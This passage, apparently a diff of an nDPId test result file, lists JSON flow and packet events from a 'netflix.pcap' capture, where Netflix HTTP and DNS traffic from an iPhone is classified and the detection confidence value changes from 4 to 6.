+00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043012,"flow_last_seen":1484319043068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043068,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/af7a5\/362643424e775d0393ddb46e145c2375367af7a5.webp","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043013,"flow_last_seen":1484319043078,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043078,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/5758c\/bb636e44b87ef854c331ed7b7b6e157e4945758c.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043665,"flow_last_seen":1484319043665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1484319043665,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043665,"pkt":"gCqoTGHM5JjWH70UCABFAABAaV9AAEAGi3bAqAEHuBnMGc+eAFByPGEHAAAAALAC\/\/9NegAAAgQFtAEDAwUBAQgKH2ThCQAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1484319043688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043688,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz57u7DQucjxhCKAScSCMigAAAgQFtAQCCAr\/\/D2rH2ThCQEDAwU="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1484319043689,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043689,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VAZAAEAGoNvAqAEHuBnMGc+eAFByPGEI7uw0L4AQEBUcSAAAAQEICh9k4SH\/\/D2r"} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043665,"flow_last_seen":1484319043691,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043691,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/87b33\/bed1223a0040fdc97bac4e906332e462c6e87b33.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043665,"flow_last_seen":1484319043691,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043691,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/87b33\/bed1223a0040fdc97bac4e906332e462c6e87b33.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1484319044993,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1484319044993,"pkt":"gCqoTGHM5JjWH70UCABFAAAoz5tAAEAGHmfAqAEHNBhXBs7BAbvkIOdlTYzTZlAUEACWDAAAAAAAAAAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048757,"flow_last_seen":1484319048757,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1484319048757,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1484319048757,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1484319048757,"pkt":"gCqoTGHM5JjWH70UCABFAABBS2MAAP8R7O\/AqAEHwKgBAeL2ADUALZ5c\/mQBAAABAAAAAAAAB2FwcGJvb3QHbmV0ZmxpeANjb20AAAEAAQ=="} 
-00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048757,"flow_last_seen":1484319048757,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1484319048757,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048757,"flow_last_seen":1484319048757,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1484319048757,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1484319048776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1484319048776,"pkt":"5JjWH70UgCqoTGHMCABFAACy4UZAAEAR1ZvAqAEBwKgBBwA14vYAnkKZ\/mSBgAABAAUAAAAAB2FwcGJvb3QHbmV0ZmxpeANjb20AAAEAAcAMAAUAAQAAAG0ADgdhcHBib290A2dlb8AUwDEABQABAAABawAbB2FwcGJvb3QJdXMtd2VzdC0yBnByb2RhYcAUwEsAAQABAAAACwAENsm\/hMBLAAEAAQAAAAsABDQr9VrASwABAAEAAAALAAQ0GfQx"} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":796,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1484319048776,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.201.191.132"}} 
+00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":796,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1484319048776,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.201.191.132"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048780,"flow_last_seen":1484319048780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319048780,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1484319048780,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319048780,"pkt":"gCqoTGHM5JjWH70UCABFAABAtrNAAEAGzAfAqAEHNsm\/hM+fAFA6e8d6AAAAALAC\/\/+ZMQAAAgQFtAEDAwUBAQgKH2T0hAAAAAAEAgAA"} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1484319048824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319048824,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGmJ82yb+EwKgBBwBQz59tgW\/FOnvHe6ASRep1DwAAAgQFtAQCCApXXrqDH2T0hAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1484319048826,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319048826,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VQxAAEAGLbvAqAEHNsm\/hM+fAFA6e8d7bYFvxoAQEBXZhAAAAQEICh9k9LFXXrqD"} -00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319048780,"flow_last_seen":1484319048830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1484319048830,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"appboot.netflix.com","url":"appboot.netflix.com\/appboot\/NFAPPL-02-","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 
+00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319048780,"flow_last_seen":1484319048830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1484319048830,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"appboot.netflix.com","url":"appboot.netflix.com\/appboot\/NFAPPL-02-","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049465,"flow_last_seen":1484319049465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049465,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1484319049465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049465,"pkt":"gCqoTGHM5JjWH70UCABFAABAjtZAAEAGjk7AqAEHNFkni8+gAFCVL\/AiAAAAALAC\/\/+toQAAAgQFtAEDAwUBAQgKH2T3IAAAAAAEAgAA"} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1484319049510,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049510,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwBQz6CC\/YxQlS\/wI6ASRerkyQAAAgQFtAQCCAqtiNcHH2T3IAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1484319049516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049516,"pkt":"gCqoTGHM5JjWH70UCABFAAA0TN5AAEAG0FLAqAEHNFkni8+gAFCVL\/Ajgv2MUYAQEBVJOgAAAQEICh9k91KtiNcH"} -00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049465,"flow_last_seen":1484319049518,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":649,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1484319049518,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 
-00832{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":878,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1484319049465,"flow_last_seen":1484319049580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4993,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":1484319049580,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049465,"flow_last_seen":1484319049518,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":649,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1484319049518,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 
+00832{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":878,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1484319049465,"flow_last_seen":1484319049580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4993,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":1484319049580,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049641,"flow_last_seen":1484319049641,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049641,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1484319049641,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319049641,"pkt":"gCqoTGHM5JjWH70UCABFAABCJHQAAP8RE97AqAEHwKgBAcoQADUALkrZBBoBAAABAAAAAAAABGE4MDMEZHNjZwZha2FtYWkDbmV0AAABAAE="} 
-00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049641,"flow_last_seen":1484319049641,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049641,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049641,"flow_last_seen":1484319049641,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049641,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049645,"flow_last_seen":1484319049645,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049645,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1484319049645,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319049645,"pkt":"gCqoTGHM5JjWH70UCABFAABCunsAAEARPNfAqAEHwKgBAcx7ADUALmwlX+cBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAE="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049645,"flow_last_seen":1484319049645,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049645,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049645,"flow_last_seen":1484319049645,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049645,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1484319049665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1484319049665,"pkt":"5JjWH70UgCqoTGHMCABFAABi4UdAAEAR1erAqAEBwKgBBwA1yhAATkFkBBqBgAABAAIAAAAABGE4MDMEZHNjZwZha2FtYWkDbmV0AAABAAHADAABAAEAAAAMAAS4GcwYwAwAAQABAAAADAAEuBnMKA=="} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":891,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
